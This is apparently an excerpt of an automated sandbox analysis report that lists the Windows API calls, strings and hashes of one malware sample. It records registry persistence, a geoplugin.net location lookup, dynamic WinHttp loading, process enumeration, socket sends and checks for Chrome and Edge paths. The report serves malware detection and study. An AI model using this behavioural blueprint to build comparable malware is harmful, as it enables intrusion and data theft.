                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Internet$CloseHandleOpen$FileRead
                                                                                                                                                                                                                                                                                                                              • String ID: http://geoplugin.net/json.gp
                                                                                                                                                                                                                                                                                                                              • API String ID: 3121278467-91888290
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(10021794), ref: 1002179D
                                                                                                                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(?,10021794), ref: 100217EF
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 10021817
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 100217BA: GetProcAddress.KERNEL32(00000000,100217AB), ref: 100217BB
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 100217BA: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,100217AB,10021794), ref: 100217CD
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 100217BA: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,100217AB,10021794), ref: 100217E1
Memory Dump Source
• Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 2099061454-0
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                                                                                                                                                                                                                                                                                              • RegSetValueExA.KERNEL32(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                                                                                                                                                                                                                                                                                                              • RegCloseKey.KERNEL32(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                                                                                                                                                                                                                                                                                              Strings
Memory Dump Source
• Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CloseCreateValue
                                                                                                                                                                                                                                                                                                                              • String ID: HgF$pth_unenc
                                                                                                                                                                                                                                                                                                                              • API String ID: 1818849710-3662775637
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 10007310: LoadLibraryW.KERNEL32(winhttp.dll,?,10002B6F), ref: 10007316
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 10007310: GetProcAddress.KERNEL32(00000000,WinHttpOpen), ref: 10007333
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 10007310: GetProcAddress.KERNEL32(00000000,WinHttpConnect), ref: 10007340
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 10007310: GetProcAddress.KERNEL32(00000000,WinHttpOpenRequest), ref: 1000734D
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 10007310: GetProcAddress.KERNEL32(00000000,WinHttpSendRequest), ref: 1000735A
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 10007310: GetProcAddress.KERNEL32(00000000,WinHttpReceiveResponse), ref: 10007367
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 10007310: GetProcAddress.KERNEL32(00000000,WinHttpQueryDataAvailable), ref: 10007374
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 10007310: GetProcAddress.KERNEL32(00000000,WinHttpReadData), ref: 10007381
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 10007310: GetProcAddress.KERNEL32(00000000,WinHttpCloseHandle), ref: 1000738E
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 10002BF2
                                                                                                                                                                                                                                                                                                                              Strings
Memory Dump Source
• Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: AddressProc$ErrorLastLibraryLoad
                                                                                                                                                                                                                                                                                                                              • String ID: /json$GET$WebClient/1.0$localhost
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10007722
                                                                                                                                                                                                                                                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 10007744
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 1000774F
                                                                                                                                                                                                                                                                                                                              • Process32NextW.KERNEL32(?,0000022C), ref: 1000784F
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 10007861
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(?,10021794), ref: 100217EF
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 10021817
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 1002179D: GetModuleHandleA.KERNEL32(10021794), ref: 1002179D
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 1002179D: GetProcAddress.KERNEL32(00000000,100217AB), ref: 100217BB
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 1002179D: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,100217AB,10021794), ref: 100217CD
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 1002179D: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,100217AB,10021794), ref: 100217E1
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,00000000,?,?,10001539,?,00000000,000000FF,?), ref: 10007A5B
                                                                                                                                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,10001539,?,00000000,000000FF,?,00000000,000000FF,?,00000000), ref: 10007A6C
                                                                                                                                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,10001539,?,00000000,000000FF), ref: 10007AB8
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,?,?,10001539,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF), ref: 10007AC4
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,?,?,10001539,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF), ref: 10007AD2
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: File$CloseHandle$CreateReadSize
                                                                                                                                                                                                                                                                                                                              • String ID:
APIs
• GetModuleHandleA.KERNEL32(0283C7DD), ref: 0283C7E6
• GetModuleHandleA.KERNEL32(?,0283C7DD), ref: 0283C838
• GetProcAddress.KERNEL32(00000000,00000000), ref: 0283C860
  • Part of subcall function 0283C803: GetProcAddress.KERNEL32(00000000,0283C7F4), ref: 0283C804
  • Part of subcall function 0283C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,0283C7F4,0283C7DD), ref: 0283C816
Memory Dump Source
• Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
• Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Similarity
• API ID: AddressHandleModuleProc$ProtectVirtual
• String ID:
• API String ID: 2080333215-0
APIs
• GetProcAddress.KERNEL32(00000000,100217AB), ref: 100217BB
• VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,100217AB,10021794), ref: 100217CD
• VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,100217AB,10021794), ref: 100217E1
• GetModuleHandleA.KERNEL32(?,10021794), ref: 100217EF
• GetProcAddress.KERNEL32(00000000,00000000), ref: 10021817
Memory Dump Source
• Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Similarity
• API ID: AddressProcProtectVirtual$HandleModule
• String ID:
• API String ID: 2152742572-0
APIs
• GetLastError.KERNEL32(00000000,?,?,00445369,00446B52,00000000,?,00433637,?,?,00402BE9,?,00402629,00000000,?,00402578), ref: 00446F58
• _free.LIBCMT ref: 00446F8D
• _free.LIBCMT ref: 00446FB4
• SetLastError.KERNEL32(00000000), ref: 00446FC1
• SetLastError.KERNEL32(00000000), ref: 00446FCA
Memory Dump Source
• Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Yara matches
Similarity
• API ID: ErrorLast$_free
• String ID:
• API String ID: 3170660625-0
APIs
• PathFileExistsW.SHLWAPI(?,\Google\Chrome\Application\Chrome.exe,00000025), ref: 1000634E
Strings
Memory Dump Source
• Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Similarity
• API ID: ExistsFilePath
• String ID: (x86)$ProgramFiles$\Google\Chrome\Application\Chrome.exe
• API String ID: 1174141254-1866107781
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 15d45520dd525af8553babc3ba79aa9da1bd519a980773528a1e8930c28a5241
                                                                                                                                                                                                                                                                                                                              • Instruction ID: f5c5b1796602c674d072fdb72fdb3b9a68742e2cf3b4b57e043f71f885765a41
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 15d45520dd525af8553babc3ba79aa9da1bd519a980773528a1e8930c28a5241
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3B41DF74D10204EBEB00DFA8DC44BEEB7BAFF44784F60451DF406A7294DB38AA058BA0
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • send.WS2_32(00000278,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(0000028C,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
                                                                                                                                                                                                                                                                                                                              • SetEvent.KERNEL32(0000028C,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: EventObjectSingleWaitsend
                                                                                                                                                                                                                                                                                                                              • String ID: LAL
                                                                                                                                                                                                                                                                                                                              • API String ID: 3963590051-3302426157
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 7c758ff3063472b318873a36f1587021102d333a50ed455a36629e6638d962b4
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 8f6f307dcfa5e25975ae7096dc57d747427bb4b25c3784bf73346896dbb4b4c1
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c758ff3063472b318873a36f1587021102d333a50ed455a36629e6638d962b4
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B82123B29001196BCF04ABA5DC96DEE777CBF54358B00413EF916B21E1EA78AA04D6A4
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                                                                                                                                                                                                                              • RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                                                                                                                                                                                                                              • RegCloseKey.KERNEL32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CloseCreateValue
                                                                                                                                                                                                                                                                                                                              • String ID: TUF
                                                                                                                                                                                                                                                                                                                              • API String ID: 1818849710-3431404234
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 4d8f19d4f5fba69279ea975c705bdc3302fb28fe13ea63ccb444db4f968143a5
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8DE03071540204BFEF115B909C05FDB3BA8EB05B95F004161FA05F6191D271CE14D7A4
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
                                                                                                                                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
                                                                                                                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3360349984-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 390182afd35e16d175a65701dd8407d599f17f69dcb559d0e745b5afb9433225
                                                                                                                                                                                                                                                                                                                              • Instruction ID: f4983b6e647f91c6eb1a16b69ab68a2f9d5597509a23169db7b615edd0c6cdea
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 390182afd35e16d175a65701dd8407d599f17f69dcb559d0e745b5afb9433225
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 34417171508301ABC700FB61CC55D7FB7E9AFD5315F00093EF892A32E2EA389909866A
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • Concurrency::cancel_current_task.LIBCPMT ref: 1000476A
  • Part of subcall function 1000ADE3: __CxxThrowException@8.LIBVCRUNTIME ref: 1000ADFA
• Concurrency::cancel_current_task.LIBCPMT ref: 1000477F
• new.LIBCMT ref: 10004785
• new.LIBCMT ref: 10004799
Memory Dump Source
• Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Similarity
• API ID: Concurrency::cancel_current_task$Exception@8Throw
• String ID:
• API String ID: 3339364867-0
APIs
• GetModuleHandleA.KERNEL32(?,0283C7DD), ref: 0283C838
• GetProcAddress.KERNEL32(00000000,00000000), ref: 0283C860
  • Part of subcall function 0283C7E6: GetModuleHandleA.KERNEL32(0283C7DD), ref: 0283C7E6
  • Part of subcall function 0283C7E6: GetProcAddress.KERNEL32(00000000,0283C7F4), ref: 0283C804
  • Part of subcall function 0283C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,0283C7F4,0283C7DD), ref: 0283C816
Memory Dump Source
• Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
• Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Similarity
• API ID: AddressHandleModuleProc$ProtectVirtual
• String ID:
• API String ID: 2080333215-0
APIs
• GetProcAddress.KERNEL32(00000000,0283C7F4), ref: 0283C804
• VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,0283C7F4,0283C7DD), ref: 0283C816
• GetModuleHandleA.KERNEL32(?,0283C7DD), ref: 0283C838
• GetProcAddress.KERNEL32(00000000,00000000), ref: 0283C860
Memory Dump Source
• Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
• Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Similarity
• API ID: AddressProc$HandleModuleProtectVirtual
• String ID:
• API String ID: 2492872976-0
APIs
• CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
• GetFileSize.KERNEL32(00000000,00000000), ref: 0041B657
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041B67C
• CloseHandle.KERNEL32(00000000), ref: 0041B68A
Memory Dump Source
• Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Yara matches
Similarity
• API ID: File$CloseCreateHandleReadSize
• String ID:
• API String ID: 3919263394-0
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CountEventTick
                                                                                                                                                                                                                                                                                                                              • String ID: >G
                                                                                                                                                                                                                                                                                                                              • API String ID: 180926312-1296849874
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 10008357
                                                                                                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 10008361
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                                                                                              • String ID: string too long
                                                                                                                                                                                                                                                                                                                              • API String ID: 909987262-2556327735
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • PathFileExistsW.SHLWAPI(-00000002,\AppData\Local\Microsoft\Edge\,0000001E,00000000,-00000002,00000000), ref: 100060BB
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
